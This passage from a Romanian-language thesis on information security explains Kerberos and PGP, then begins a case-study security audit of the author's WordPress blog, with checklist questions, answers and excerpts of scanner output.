Criptarea mesajului. Întregul mesaj poate fi criptat cu cheia publică a destinatarului pentru a asigura confidențialitatea conținutului mesajului.

Decriptarea mesajului. Mesajul poate fi decriptat cu cheia privată a destinatarului.

Marcarea orei. O marcă de timp poate fi folosită pentru a urmări tranzacția, în cazul în care, în viitor, apare un diferend.

Cu toate acestea, în cazul unui mesajului foarte scurt, nu este nevoie de transmiterea separată, deoarece poate fi recuperat chiar din semnătură.

2.12 Protocolul KERBEROS

Problema autentificării utilizatorilor și programelor în rețelele de sisteme informatice devine tot mai critică datorită numeroaselor posibilități de ocolire a mecanismelor clasice bazate pe parole. Un utilizator care are acces la un sistem multi user sau la un serviciu Internet va trebui să se autentifice folosind o parolă. Sistemele bazate pe parole sunt vulnerabile la atacuri prin încercări repetate (brute force) sau la ascultarea conexiunilor pe care se transmit parolele (sniffer). De aceea, ultimii ani au dus la implementarea unor servicii de autentificare bazate pe protocoale criptografice. Astfel a fost creat cel mai puternic și mai utilizat serviciu de autentificare care se numește Kerberos Authentication Server.

Protocolul Kerberos a fost proiectat la Universitatea MIT14 în cadrul proiectului Athena, în jurul anului 1984. Ideea de bază aparține lui Needham și Schroedercare care au publicat ideea inițială în 1978 în Communications of theACM.

Scopul protocolului Kerberos este de a permite unui client să-și demonstreze identitatea unui server aflat la distanță, undeva dincolo de o rețea complet nesigură. Protocolul garantează de asemenea că clientul nu poate conversa cu un calculator care se dă drept server. Autentificarea se face în ambele direcții. Protocolul în sine constă dintr-un schimb de mesaje între un client și o serie de servere, fiecare cu o altă misiune.

Protocolul Kerberos indică de fapt o serie de mesaje care trebuie schimbate între părțile care doresc să comunice, unele din mesaje fiind criptate folosind o funcție de criptare/decriptare (funcția greu inversabilă). Implementările inițiale foloseau algoritmul standard de criptare DES (Data Encryption Standard) descris anterior. Acum se folosește AES(Advanced Encryption Standard). În mod normal într-un domeniu administrativ în care se folosește Kerberos programe ca telnet, rlogin, POP (post-office protocol), fișiere la distanță (AFS), etc trebuie setate în așa fel încât clientul să se autentifice serverului folosind noua metodă. Toate aceste aplicații sunt de tip client-server.

Descrierea protocolului[5]:

Se trimite un mesaj de la client spre AS (serverul de autentificare – „authentication server”), prin care se indică intenția de a comunica cu serverul de disc;

Se trimite un mesaj de răspuns de la AS pentru client, prin care AS îi trimite clientului noua cheie de sesiune și pachetul pentru serverul de disc;

Se trimite un mesaj de la client spre serverul de disc, în care este inclus pachetul de mai sus, pentru a garanta faptul că clientul a discutat cu AS (pachetul poate veni numai de la AS);

Un mesaj de răspuns de la serverul de disc prin care clientul este convins că serverul a putut deschide pachetul, deci că discută într-adevăr cu serverul de disc.

După acest schimb inițial de mesaje clientul și serverul de disc vor folosi cheia de sesiune generată deAS pentru a criptaAES toată comunicația dintre ei.

Implementarea protocolului Kerberos este dificilă în practică. Condițiile ideale existente pe hârtie sunt greu de obținut într-o rețea reală de sisteme informatice.

Să observăm că clientul trebuie să păstreze undeva cheile de sesiune pentru a putea conversa cu serverele: fiecare mesaj trimis după cele de autentificare va fi criptat cu aceste chei. Aceste chei expiră în 25 de ore, deci sunt totuși mai puțin importante decât o parolă care teoretic este folosită luni întregi.

Într-o rețea mare de sisteme informatice sincronizarea ceasurilor se face automat, folosind un protocol numit NTP: Network Time Protocol. Un atac informatic poate fi următorul: un atacator înregistrează o serie de mesaje de la un client care știe că reprezintă o tranzacție importantă. Peste o săptămână atacatorul infiltrează în rețea mesaje false NTP prin care setează ceasul unui server cu o săptămână în urmă. După asta atacatorul retransmite mesajele capturate, care vor fi re-executate, pentru că serverului îi par proaspete.

14 Massachusetts Institute of Techonology

2.13 PGP

Pretty Good Privacy (PGP) [web9] este un produs de criptare cu care se pot trimite mesaje și fișiere în siguranță, cripta partiții de pe disc și / sau legăturile în rețea.

Cerințele de securitate în poșta electronică au condus la realizarea mai multor suite de programe destinate protecției criptografice a mesajelor trimise prin rețele. Dintre acestea, cel mai popular este PGP (Pretty Good Privacy) dezvoltat de Philip Zimmermann în Statele Unite. Acest pachet a stârnit controverse datorită răspândirii sale pe INTERNET și a folosirii lui în toată lumea fără să se respecte drepturile americane de licență și de export, destul de rigide în privința algoritmilor criptografici. Zimmermann a fost anchetat în 1994 de o comisie federală pentru acuzația de nerespectare a legilor americane privind exportul de sisteme criptografice. FBI (Federal Bureau of Investigation) l-a învinuit pe Zimmermann de punerea pe INTERNET a PGP-ului, în arhive publice, ceea ce a condus la o răspândire necotrolabilă a utilizării sale. PGP-ul este folosit astăzi de la studenți și particulari până la organizații naționale, internaționale sau agenții guvernamentale.

PGP este un pachet de programe destinat protecției poștei electronice și a fișierelor folosind cifrare clasică și cu chei publice[3]. Cu ajutorul său se pot stabili modalități sigure de comunicație, nefiind necesară schimbarea prealabilă a unor chei de cifrare. PGP include un sistem sigur de gestiune a cheilor, autentificarea datelor prin semnătură digitală și compresia datelor. El funcționează pe diferite platforme fiind astfel o aplicație practică și larg utilizabilă. PGP satisface trei cerințe fundamentale:

caracterul privat al poștei electronice, ceea ce înseamnă că doar destinatarul desemnat al scrisorii poate citi conținutul acesteia;

autentificarea emițătorului;

autentificarea mesajelor, adică certitudinea că mesajele nu au fost modificate de alte persoane.

Câteva acțiuni posibile cu ajutorul suitei PGP:

criptarea fișierelor: se poate folosi PGP-ul pentru a cripta fișierele proprii folosind algoritmul de criptare cu chei secrete IDEA; după criptare, fișierul poate fi decriptat doar de cineva care cunoaște parola de criptare a fișierului;

crearea de chei secrete și publice necesare pentru a cripta, decripta și semna mesajele trimise sau primite;

gestionarea cheilor: folosind PGP se poate crea și menține o menține o bază de date care să conțină cheile publice ale persoanelor din agenda de corespondență electronică;

transmiterea și recepționarea de mesaje e-mail criptate;

folosirea semnăturilor digitale: PGP-ul poate face o semnare electronică a documentelor sau poate verifica semnătura oricărei persoane;

certificarea cheilor: PGP-ul asigură această caracteristică prin semnarea electronică a cheilor publice;

revocarea, dezactivarea și custodia cheilor: atunci când cheile sunt compromise, ele se pot revoca sau dezactiva; de asemenea oferă spațiu de păstrare a cheilor folosind facilitățile de custodie;

configurarea după necesități a PGP-ului: se pot schimba setările variabilelor din fișierul de configurare a PGP-ului;

folosirea serverelor de chei PGP de pe INTERNET: se poate adăuga cheia publică la o bază de date de pe server sau se pot obține alte chei publice care se află pe server.

Capitolul 3. Studiu de caz.Auditul de securitate al unui blog

Auditul de securitate al blogului îl voi face având la bază ghidul de audit oferit ca exemplu în suportul de curs „Adrian Munteanu – Auditul sistemelor informatice, suport de curs, F.E.A.A., Universitatea “Alexandru Ioan Cuza” Iași” [4] și în „Ghid de audit IT (controale generale) pentru masteranzii C.A.A. – Auditul sistemelor informatice” al domnului conf. univ. dr. Bogdan Pătruț. Acest audit va avea întrebările și răspunsurile de bază efectuate pe blogul personal și o completare cu modul de implementare al indicatorilor în cadrul unei firme deoarece unele probleme care se analizează în cadrul unei asociații nu se pot aplica pe blog. Nu voi utiliza un plan al auditului deoarece multe din punctele esențiale se aplică doar la nivel de firmă.

Fiecare audit de securitate este particularizat în funcție de planul de audit întocmit împreună cu organizația auditată. Auditul de securitate al sistemelor informatice este structurat pe mai multe domenii, acestea fiind securitatea fizică a sistemului informatic, securitatea rețelei din care face parte sistemul, protocoale/servicii, securitatea utilizatorului, securitatea stocării datelor, parole și factorul uman.

3.1. Securitatea fizică

De multe ori ignorată, securitatea fizică a sistemului informatic este poate cea mai importantă parte în menținerea securității informației. În general sunt mult mai mulți factori care trebuie luați în considerare pentru ca acel sistem să fie sigur.

Sistemul este localizat pe o suprafață dreaptă, fixă și de preferat la o distanță de minim 10 cm față de pământ?

Acest punct nu se poate analiza în cazul blogului. Totuși, firma care asigură găzduirea domeniului declară pe site-ul propriu:” Datacenterul are o suprafață de peste 3358 metri pătrați de spațiu disponibil. Clădirea este construită pentru rezistență deosebită chiar în caz de cutremur de intensitate mare. Podelele sunt înălțate și tot sistemul de cablaj este conceput de așa natură încât să asigure o infrastructură securizată.”

În cazul unei organizații se verifică dacă sistemul informatic este amplasat în așa fel încât să fie protejat de mizerii și umezeală și are o poziție corespunzătoare. Se verifică astfel securitatea fizică a sistemului din punct de vedere al protecției împotriva defectărilor mecanice datorate unei poziționări improprii a acestuia.

Sistemul este ferit de orice sursă de lumină excesivă, vânt, apă sau temperaturi extreme?

Acest punct nu se poate analiza în cazul blogului. În cazul unei organizații se verifică dacă este asigurată protecția fizică a sistemului împotriva factorilor mecanici care pot afecta funcționarea acestuia (fiecare sistem informatic funcționează între anumiți parametri ambientali fiind afectat de schimbări bruște de climă).

În caz de trafic intens în incinta unde se află sistemul, există o monitorizare permanentă? În incinta unde se află sistemul există un sistem de alarmă și/sau accesul este securizat?

Acest punct nu se poate analiza în cazul blogului. Firma de hosting menționează că „Accesul este permis numai personalului autorizat. Sistemele de securitate sunt completate de detectoare de mișcare și camere video amplasate strategic în întregul datacenter.”

Într-o organizație este de dorit securizarea încăperilor în care se poate face accesul la sistemele informatice. Astfel, se verifică dacă există o monitorizare a sălilor în care sunt amplasate serverele și / sau alte sisteme informatice sensibile. Se verifică dacă accesul la sistemele informatice este făcut conform programului de funcționare întocmit și dacă există modalități de alertare în caz de pătrundere prin efracție. Totodată, se poate verifica dacă este securizat accesul în încăperile care au în dotare sisteme informatice care stochează date ale căror securitate este necesară. Ideal ar fi ca sala în care sunt păstrate și funcționează sistemele informatice tip server să fie izolată de accesul permanent și să fie cu acces restricționat. Securizarea accesului se poate face prin utilizarea de încuietori inteligente pe bază de cititoare de carduri, recunoaștere biometrică (ochi, față, amprentă), recunoaștere vocală sau combinații ale acestora.

Terminalul sistemului este securizat, astfel încât persoanele neautorizate să nu poată avea acces la el? Sunt obligați utilizatori să se delogheze de pe acel terminal în cazul în care pleacă de lângă sistem?

Acest punct nu se poate analiza în cazul blogului. În cazul unei organizații accesul la terminale trebuie făcut pe bază de utilizator și parolă. Se verifică dacă există implementată o politică restrictivă de securitate pe bază de user și parolă. Totodată, se verifică dacă utilizatorii cunosc faptul că nu trebuie să părăsească terminalul atâta timp cât sunt autentificați cu userul și parola încredințate.

Sursele de curent sunt protejate?

Acest punct nu se poate analiza în cazul blogului. Conform menționării firmei de partajare, „sistemul de alimentare cu energie electrică are un înalt grad de tolerabilitate la eventualele fluctuații de tensiune. În caz de necesitate, generatoare auxiliare sunt activate automat. Încărcătura intermediară este preluată pentru perioade mai mari de o oră de UPS-uri, cu toate că nu este necesară o asemenea perioadă, datorită faptului că generatoarele sunt activate și funcționale în mai puțin de 16 secunde în eventualitatea unei căderi de tensiune.”

Se verifică dacă sistemul informatic este asigurat împotriva căderilor de tensiune sau supra sarcinilor de tensiune. În cazul lipsei unei protecții în cazul unei pene de curent sistemul se oprește brusc acest lucru putând afecta sistemul de operare și / sau datele existente în acel calculator.

Porturile paralel/ serial/ IR /USB /SCS /FW sunt securizate sau dezactivate?

Acest punct nu se poate analiza în cazul blogului. Într-o organizație este de dorit restricționarea utilizării porturilor fizice care pot permite sustragerea informației sau conectarea unor dispozitive neautorizate la terminal sau rețea. Se verifică dacă este aplicată politica de restricționare a accesului la porturile neutilizate.

3.2. Securitatea rețelei

După ce se verifică securitatea fizică a sistemelor informatice trebuie verificată și securitatea fizică a rețelei. Dacă sistemul operează într-o rețea sau într-un cadru multi-user există o mare posibilitate ca acesta să fie ținta unui atac informatic. Securitatea unei rețele este mult mai greu de evaluat deoarece necesită o cunoaștere în profunzime atât a diverselor niveluri OSI și componente de sistem, cât și a serviciilor care interacționează cu sistemul în cauză.

Este rețeaua fizică (cablu, router, switch, proxy, firewall, etc) securizată, astfel încât nu există pericolul unui acces/modificare neautorizat/ă a topologiei acesteia? Au doar persoanele autorizate acces fizic la infrastructura rețelei? Cunoașteți și aveți încredere în persoanele care administrează rețeaua fizică?

Acest punct nu se poate analiza în cazul blogului. În cazul unei organizații se verifică securitatea fizică a componentelor rețelei. Accesul la componentele sensibile trebuie să fie fizic restricționat (de exemplu routerele nu trebuie să aibă acces public) pentru a nu permite distrugerea acestora sau modificarea infrastructurii (introducerea de alte dispozitive în rețea).

Celelalte sisteme care sunt conectate la rețea sunt sigure atât fizic cât și electronic?

Acest punct nu se poate analiza în cazul blogului. Dacă sistemul informatic are un nivel de securitate ridicat față de alte computere dar se găsește în aceeași incintă, atunci pericolul ca acest sistem să fie accesat de către persoane neautorizate crește foarte mult. Astfel, se verifică dacă sistemele informatice care folosesc date clasificate de un anumit grad sunt protejate corespunzător împotriva accesului neautorizat.

Rețeaua este protejată prin proxy și/sau firewall? Dacă da, acestea sunt configurate corect?

Acest punct nu se poate analiza în cazul blogului. Din testul de penetrare executat s-a dedus faptul că firewall-ul a restricționat accesul la server după ce a intervenit

o suprasolicitare a serviciilor.

Într-o organizație se verifică modul de configurare a dispozitivului / programului de firewall și / sau a modului de utilizare a intermedierilor între rețeaua proprie și cea publică (proxy). Se verifică dacă setările din firewall sunt făcute pe tipuri de servicii și pe particularizat pe programe.

3.2.1 Traficul autorizat produs în rețea

Cunoașteți numele, funcționalitatea, producătorul și natura aplicațiilor software instalate pe sistemul în cauză? Ați verificat dacă există update-uri de securitate, și dacă da, le-ați instalat mereu?

Motorul software care susține blogul este wordpress. Acesta este actualizat la zi, având toate patch-urile de securitate aplicate. Pluginurile instalate fac parte din suita recomandată de producătorii wordpress. Actualizarea programului și a pluginurilor se face de fiecare dată când apare o versiune nouă sau un patch nou. Serverul care susține platforma de găzduire rulează un sistem Linux, actualizat cu patch-urile de securitate existente (kernel actualizat – 2.6.18-194.11.4.el5). Intefața cPannel care controlează partea de server este actualizată la ultima versiune (cPannel 11.28).

În cazul unei organizații problema este ceva mai complicată. Pornind de la sistemul de operare aflat pe sistemele informatice și terminând cu aplicațiile care rulează pe ele, tot trebuie verificat. Astfel, se verifică dacă sistemul de operare este la zi cu actualizările existe (și, bineînțeles, se verifică dacă este licențiat dacă nu este open source). Se verifică pe rând aplicațiile care rulează pe el și dacă sunt actualizate. Se compară lista aplicațiilor existente cu lista aplicațiilor care trebuie să existe pe sistemul informatic. Sunt multe cazuri în care utilizatorii instalează diverse aplicații fără a avea aprobul pentru aceasta (mai ales aplicații de socializare sau partajare în rețea – p2p).

Ați verificat dacă serviciile care interacționează cu rețeaua nu permit “by default” accesul neautorizat la sistem?

Conturile de transfer fișiere și email (ftp pop3, smtp / imap) sunt protejate prin parolă și criptare. Folosind un program de scanare a porturilor / serviciilor deschise, acesta a descoperit că serviciul ftp nu permite accesul neautentificat.

The remote FTP banner is :

220–––- Welcome to Pure-FTPd [privsep] [TLS] –––-

220-You are user number 7 of 50 allowed.

220-Local time is now 20:50. Server port: 21.

220-This is a private system – No anonymous login

În cazul organizației se verifică dacă parolele implicite pentru utilizatorii de servicii în rețea au fost schimbate (parola pentru root, pentru contul nobody pentru serviciul ftp, etc). Se verifică și modul în care a fost setat accesul pe care îl au programele în sistem / rețea.

Există o limitare a utilizatorilor, astfel încât să se prevină scurgerea de informații sensibile legate de securitatea sistemului în cauză?

Pe blog sunt utilizate două tipuri de cont: administrator și editor. Administratorul are acces la toate setările însă editorul are acces doar la partea de editare a articolelor sau paginilor. El nu poate schimba nicio setare care ține de motorul wordpress. Accesul la contul de hosting se face doar prin intermediul interfeței cPannel. Singurul cont de acces este cel de administrator, pe care îl folosește o singură persoană.

Figura 2 Contul de acces administrator cpanel

Figura 3 Interfața administrator blog

se poate observa din figura 3 întregul meniu al administratorului blogului. Spre diferență de acesta, editorul nu are decât o mică parte. Editorul a primit acces doar la setările care implică adăugarea de articole, text sau multimedia, managementul comentariilor lăsate de utilizatori la articolele postate și partea de vizualizare a statisticilor privind site-ul.

la nivelul unei organizații informațiile sensibile trebuie accesate pe baza principiului necesității de a cunoaște. Astfel, informațiile trebuie să fie accesate doar de acele persoane care au nevoie de ele. De exemplu, un utilizator care se ocupă de comenzile primite nu are nevoie de acces la fișierele create de secția dezvoltare / cercetare. Se verifică dacă există o listă de acces pentru utilizatori la resursele protejate ale sistemului (lista de control al accesului – ACL), dacă directoarele de fișiere care aparțin anumitor secții sunt restricționate prin parolă sau listă de acces și dacă nivelul de acces al unei categorii de

utilizatori corespunde cu nevoile lor de cunoaștere. În cazul unei rețele interne care cuprinde mai multe subrețele se verifică dacă dintr-o subrețea se poate accesa fără autorizare resursele altei subrețele.

Permiteți utilizatorilor autorizați să ruleze linii de comandă/shell prin care să acceseze de la distanță sistemul?

Accesul la distanță pe contul de hosting se poate face doar pe bază de user și parolă, cunoscute doar de către administrator. Accesul este protejat folosind serviciul ssh iar în cazul folosirii transferului prin ftp se folosesc versiuni securizate ale programelor (vsftp – very secure file transfer protocol).

În cazul organizației se verifică existența conturilor de utilizatori la distanță / remote. În cazul existenței acestora se va verifica dacă autentificarea și autorizarea utilizatorilor se face folosind servicii de criptate (de obicei VPN-uri). Se verifică dacă din contul de utilizator obișnuit se pot accesa setările sistemului (slabă configurare a politicilor de securitate).

Există loguri de sistem cu toată activitatea produsă în rețea?

Serviciul de hosting oferă mai multe opțiuni de salvare / utilizare a fișierelor log. Astfel, se pot efectua diverse statistici sau se poate verifica cine și în ce loc a accesat domeniul.Aceste servicii sunt activate și funcționale.

Figura 4 Opțiuni pentru fișiere log

Figura 5 Ultimele accesări afișate în interfața administrator cPannel

Pentru o studiere mai profundă a accesului se poate descărca fișierul log în format text și studia pentru a descoperi eventualele accesări / tentative neautorizate .

în cazul organizației fișierele log sunt esențiale pentru verificarea modului de acces la informațiile stocate sau a tentativelor de acces în diverse zone protejate ale

sistemului informatic. Se va verifica și ce anume stochează fișierele log (dacă salvează ora accesării, locația accesată, locația de unde a fost accesat sistemul, protocolul prin care s-a realizat accesarea și / sau alte informații) precum și cine are acces la aceste fișiere (drepturile de scriere / citire / accesare).

Utilizatorii de sistem sunt obligați ca după o anumită perioadă să-și schimbe parolele?

Utilizatorii blogului își schimbă benevol parola o dată la 2 luni.

În cazul organizației se verifică dacă parolele alocate utilizatorilor sunt permanente sau temporare și dacă sunt utilizatorii cunosc faptul că parola trebuie schimbată periodic.

Traficul din rețea este criptat?

Serviciul de hosting suportă opțiuni de criptare a traficului la / de la server. Acest lucru a fost descoperit folosind diverse instrumente de testare (aplicațiile Nessus și W3af)

–––––––––– snip ––––––––––The host name known by Nessus is : blog.cman-home.com

The CommonName of the certificate is : host.rack28.com. The version of the remote DNS server is :

9.3.6-P1-RedHat-9.3.6-16.P1.e15

209.188.91.108 resolves as blog.cman-home.com.

The remote host name is : host.rack28.com

Country: US

Email Address: [anonimizat]

Common Name: host.rack28.com

Email Address:[anonimizat]

Serial Number: 75 67 D1 10

Version: 3

Signature Algorithm: SHA-1 With RSA Encryption

Not Valid Before: Nov 20 04:01:40 2014 GMT

Not Valid After: Nov 20 04:01:40 2015 GMT

Public Key Info:

Algorithm: RSA Encryption

Public Key:

00 D5 53 2D E4 A3 8C 20 17 22 6C 11 B6 89 68 2C 97 6A B7 23 51 3E EE CB F3 16 11 AA 6E 75 80 9B 99 2B 23 3C 62 8E 83 3C CC 69 74 05 80 C2 F2 8D 88 D9 E8 06 F4 6A CE 7C C9 BB 5C 63 27 EB 8D 12 E8 CA AA BB 91 B5 61 31 B7 BE 53 94 84 D0 7F 35 AA 8F 02 3E 04 C1 12 CA 9C B4 C2 5A 5B 73 39 A6 12 D3 C0 2F 75 2C 62 21 8D 15 A6 91 50 72 60 EC EC 9F 27 2B A8 1D 0F 86 7B 13 E7 A4 64 A7 53 CE B7

Exponent: 01 00 01

Signature:

00 42 54 49 67 3E B0 4E 1B 65 05 87 54 13 CE 44 B5 4F 19 14 DC EE 7A 98 A9 4A 3C E3 6F C3 F6 63 06 49 35 29 E1 6D 4A A2 0D 29 BD F4 3D D2 CC CE C0 53 76 02 59 E3 FD 91 B4 8C 24 11 7B 6D 15 D5 48 5F 6B F4 32 7B A7 7F 46 BB 82 7E 0F F0 50 8C 43 09 A6 0F 71 0D 44 CE FD F7 98 CE 8C A4 BB 90 DC 74 CD 52 EA 33 FD 95 81 22 70 16 EF 9D 0A 69 F1 92 72 BA AE AC 2C 80 F3 5A 18 27 C0 43 E0 7A 3C

Extension: Subject Key Identifier (2.5.29.14)

Critical: 0

Subject Key Identifier: 2E 39 4E 82 1C 8F D9 43 A4 13 70 E8 33 67 C5 EF FB 4E 9A E0

Extension: Authority Key Identifier (2.5.29.35)

Critical: 0

–––––––––– snip ––––––––––

Într-o companie se verifică existența rețelelor securizate și criptate (VPN). Se verifică modul în care este întocmită documentația acestor rețele și protocolul de criptare utilizat.

Se permite folosirea de clienți de chat de genul Yahoo Messenger, gTalk, Skype, etc?

Clienții de mesagerie instant sau VoIP sunt vulnerabili la diverse atacuri. Se

verifică dacă există astfel de clienți pe sistemele informatice. Se verifică dacă există protejare prin criptare a discuțiilor online (aplicația de mesagerie instant Pidgin suportă criptarea conversației)

3.2.2 Traficul neautorizat produs în rețea

Se verifică cu regularitate dacă există încercări neautorizate de conectare la sistemul în cauză?

Administratorul blogului (aceeași persoană cu administratorul contului de hosting) verifică periodic (săptămânal) logurile de pe contul de găzduire și aproape zilnic starea de funcționare a blogului. Tentativele de acces neautorizate precum și tentativele de spam sunt raportate (la servicii gen spamcop.net și la firmele ale căror identitate este folosită pentru spam / phishing) iar ip-urile de la care s-au încercat aceste tentative sunt blocate.

Figura 7. Lista de ip-uri blocate pe serverul cman-home.com

În cazul unei organizații auditorii verifică existența fișierelor log și dacă administratorii verifică logurile de pe sistemele informatice. Se poate verifica și existența unor proceduri standard de acțiune în cazul detecției tentativelor de acces neautorizat la sistem.

Se verifică cu regularitate dacă există programe neautorizate care rulează pe sistemul în cauză, și care ar putea permite conectarea persoanelor de la distanță?

Accesul la spațiul partajat pe server pentru blog se poate face și de la distanță folosind diverse protocoale și metode (ssh, ftp, interfața http). Nu se pot adăuga sau elimina niciuna din caracteristicile oferite prin contractul de găzduire. Se pot instala doar aplicații predefinite sau se pot utiliza aplicații care rulează folosind limbaje de programare web (html, php și mysql). Nu se pot accesa direct resursele sistemului de găzduire, sistemul de operare fiind întreținut de firma care asigură mentenanța sistemelor informatice partajate. Accesul prin ftp oferă doar cont de utilizator cu drepturi doar asupra fișierelor proprii și este restricționat la domeniul închiriat.

În cazul unei organizații se verifică dacă există un plan de verificare periodică a sistemelor informatice pentru prevenirea utilizării unor programe neautorizate. Se verifică și dacă politicile de securitate permit utilizatorilor să instaleze sau să ruleze alte programe decât cele existente.

Se verifică dacă există o activitate anormal de mare în rețea, produsă de sistemul în cauză?

În cazul blogului o activitate anormal de mare în rețea poate însemna faptul că serverul este infectat devenind „zombi” sau că este atacat. Un astfel de vârf privind activitatea în rețea a fost detectat în procesul de testare de către server.

În cazul organizației o activitate mare în rețea poate indica un atac asupra sau de pe sistemul informatic. În cazul în care este o rețea internă se poate identifica relativ repede de către administratorul / ii de rețea ip-ul de pe care / pe care se execută atacul.

3.2.3 Traficul wireless

Conectarea la rețeaua WIFI este parolată? Ce tip de criptare se folosește?

În cazul unei organizații slaba protejare a rețelei fără fir poate duce la succesul atacurilor asupra interceptării informațiilor transferate sau a rețelei. Fiind fără fir posibilitatea de găsire a atacatorului este foarte mică. Se verifică dacă rețeaua este parolată și criptată folosind o metodă de criptare specifică rețelelor wireless: WEP, WPA, WPA2.

Traficul de date este criptat?

Traficul de date este sensibil la atacuri. Într-o rețea fără fir fiecare terminal primește semnal când se face o transmisie de date. Un atacator poate scana rețeaua și culege pachetele de date trimise. Dacă datele nu sunt protejate prin criptare folosind unul din procedeele descrise anterior în lucrare, atacatorul are acces la datele transmise în rețea. Se verifică dacă se folosesc protocoale de criptare a informației și dacă rețeaua este restricționată la calculatoarele autentificate pe bază de serie MAC.

Se permite accesul cu dispozitive externe în rețeaua WIFI?

Un atacator poate introduce în rețea un dispozitiv care să falsifice semnalul determinând conectarea la el a tuturor celorlalte dispozitive (ARP spoof). Astfel, atacatorul poate avea acces la secvențele de inițiere a transmisiilor de date (așa numitul 3 way handshake) și, dacă rețeaua nu e criptată, poate găsi datele de autentificare ale utilizatorilor legitimi (dacă datele sunt trimise în clar). Se verifică dacă modul de conectare la rețea este protejat și dacă rețeaua este vizibilă.

3.3. Protocoale/servicii

Chiar dacă în general este acceptabil să credem că aplicațiile software care vin pre-instalate într-un sistem prezintă o securitate rezonabilă, trebuie verificat mereu dacă producătorul a lansat actualizări (în special de securitate – “Security patches”) sau alte informații relevante despre configurația specifică sistemului în cauză. Se verifică dacă sistemul rulează cu programele actualizate (sistem de operare, antivirus, firewall, utilitare, driveri).

Pentru fiecare aplicație software instalată în sistemul în cauză, trebuie verificat dacă există atât breșe de securitate cunoscute cât și metode de a le folosi (exploits). Dacă producătorul are un newsletter prin care anunță aceste probleme, administratorul de rețea trebuie să fie abonat la el. se verifică documentația existentă asupra programelor utilizate și se verifică dacă există abonamente la știrile privind actualizările de securitate ale programelor utilizate.

În cazul blogului, testul de securitate a evidențiat mai multe probleme, majoritatea fiind însă simpla detectare a serviciului existent, având o severitate medie sau scăzută.

Tabel 2 Extras din rezultatul testului de penetrare

Configurarea proastă a aplicației este probabil cea mai comună cauză prin care o persoană obține acces neautorizat la sistem. În momentul instalării acelei aplicații, s-a urmărit ghidul emis de către producător? Dacă au apărut probleme pe parcurs, acestea au fost notate și transmise departamentului însărcinat cu rezolvarea acestora?

În cazul blogului am verificat dacă interfața pentru contul de găzduire sau softul pentru blog sunt la zi. Interfața cPanel este actualizată și aplicațiile oferite (transfer fișiere, email, Php, baza de date etc) au patchurile la zi. Programul wordpress este actualizat și pluginurile utilizate au fost actualizate de fiecare dată când au existat noi versiuni sau patchuri de securitate. Nu eu existat probleme privind funcționarea aplicațiilor existente.

În cazul unei firme se verifică dacă persoanele responsabile cu instalarea și configurarea aplicațiilor au cunoștințe temeinice despre acestea și dacă există un feed-back al utilizatorilor referitor la aceste aplicații. Totodată se verifică dacă există suport tehnic pentru toate aplicațiile utilizate în sistemele informatice.

Dacă aplicația poate accesa date sensibile, utilizatorul în cauză este autorizat să lucreze cu acest program? Atât log-ul de sistem cât și datele temporare sunt stocate într-un loc sigur?

WordPress accesează doar baza de date, serverul Apache și programul Php. Baza de date în care este păstrat utilizatorul administrator al contului de găzduire este distinctă de cea care sprijină blogul. Nu există nici o legătură între cele 2 baze de date. Accesul direct la fișierele wordpress este blocat folosind fișierul .htacces. Acestea au permisii doar de acces în citire (644) neputând fi modificate din exterior. Accesul la structura de hosting este blocat. Această structură poate fi accesată doar prin intermediul interfeței cPannel. Fișierele log pot fi accesate doar prin intermediul contului de hosting, după autentificare.

Se verifică dacă utilizatorii au acces la programe în funcție de autorizațiile deținute. Se verifică existența logurilor periodice de pe sistemele informatice și modul de analiză al acestora. Se verifică și locul de salvare al fișierelor log (de exemplu, dacă acestea sunt salvate într-un director comun cu alți utilizatori aceștia pot modifica sau șterge conținutul acestor fișiere).

Dacă există aplicații de tip “daemon” (rulează în permanență), trebuie verificat modul în care reacționează la atacuri de genul “buffer overflow” sau “denial of service”.

În cazul blogului aplicațiile rulează în sistem daemon. Serverul unde este asigurată găzduirea este protejat la atacuri gen DoS, DDoS sau DrDoS dar, în general, în cazul unui atac prelungit este suspendat contul (ip-ul) atacat pentru a proteja serverul (pe care se găsesc mai multe conturi de găzduire). Astfel, în cazul testului de penetrare, serverul a înregistrat valori mult peste normal de utilizare a procesorului și memoriilor, astfel că, temporar, contul a fost suspendat. Rezultatele demonstrează faptul că nu mai pot fi accesate serviciile:

Port 2095 was detected as being open but is now unresponsive Port 80 was detected as being open but is now unresponsive Port 2096 was detected as being open but is now unresponsive Port 2087 was detected as being open but is now unresponsive Port 2222 was detected as being open but is now unresponsive Port 2086 was detected as being open but is now unresponsive Port 2082 was detected as being open but is now unresponsive Port 21 was detected as being open but is now unresponsive Port 2078 was detected as being open but is now unresponsive Port 465 was detected as being open but is now unresponsive Port 995 was detected as being open but is now unresponsive Port 53 was detected as being open but is now unresponsive Port 443 was detected as being open but is now unresponsive Port 2077 was detected as being open but is now unresponsive Port 2083 was detected as being open but is now unresponsive Port 993 was detected as being open but is now unresponsive

În cazul unei organizații se testează securitatea sistemului informatic și a setărilor referitoare la daemon-ii rulați pe acestea. Pentru aceasta se pot folosi diverse utilitare specifice auditurilor de rețele, cum ar fi Nessus, W3af, Wireshark, Nmap etc.

3.4. Securitatea utilizatorului

Securitatea utilizatorului variază în funcție de natura sistemului în cauză. În unele situații sistemul este izolat, având funcțiile unui server, acest lucru însemnând utilizatori puțini. În alte situații pe acel sistem se pot autentifica sute de utilizatori, toți având acces direct și simultan. Importanța securității utilizatorului este direct proporțională cu numărul acestora și cu tipul lor, însă nu trebuie ignorat nici faptul că e de ajuns ca un singur user să încerce să obțină acces neautorizat pentru ca tot sistemul să fie compromis.

Trebuie dezvoltată o metodă standard pentru crearea și întreținerea conturilor de utilizator. Trebuie dezvoltate reguli clare și concise, iar acestea trebuie să fie înmânate fiecărui utilizator.

Se verifică modul în care sunt creați utilizatorii și modul în care sunt menținute conturile acestora. Se verifică existența regulilor de utilizare ale sistemelor informatice și dacă utilizatorii au luat la cunoștință de acestea.

În cazul în care ne aflăm în scenariul un sistem – mai mulți utilizatori, trebuie setat nivelul de resurse pe care fiecare utilizator îl poate consuma, începând de la numărul de logări până la dimensiunea spațiului de memorie alocat. De asemenea trebuie tratată și problema în care un utilizator compromite sistemul fără intenție (ex: rularea recursivă a unui script care de fiecare dată creează un fișier de 100MB)

